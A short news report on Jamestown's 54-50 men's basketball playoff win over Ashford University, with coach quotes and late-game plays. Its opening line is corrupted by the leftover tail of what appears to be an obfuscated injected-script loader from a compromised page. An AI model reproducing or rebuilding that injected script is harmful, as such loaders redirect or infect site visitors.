JAMESTOWN iiazh|var|u0026u|referrer|tdszi||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- With the women receiving a first round bye the men needed to win to make sure both Jamestown teams would be playing on their home floor Saturday for a trip to the National Tournament, they did exactly what they needed. The Jimmies won a “12-round fight” against Ashford University (IA) 54-50.
“We told our guys it was going to be a 12-round fight,” explained head coach Justin Wieck, “not any of that new stuff you see, an old-school fight, like Ali-Frazier.” That’s exactly what it was.
The Saints came in giving up an average of just 57ppg and Jamestown with a 65ppg defensive average.
The biggest play of game was delivered by the Jimmies lone senior, Jared Sutherland, whose late three-pointer gave his squad their final lead. After Ashford scored to take a lead of 49-47 Sutherland buried his shot out of a timeout.
Taylor Newton’s floater following up a Davon Thomas 1-2 from the line put the Jimmies up five. Brandon Weston hit a deep three to cut the deficit in the final minute, but Newton’s hit two free throws to seal the victory.
Jamestown College will move onto the semi-finals to play No. 9 Rochester College at 7:30pm Saturday night.
In the other semi-final Dakota State outscored Northern New Mexico 57-32 in the second half to roll up on the Eagles 82-67.
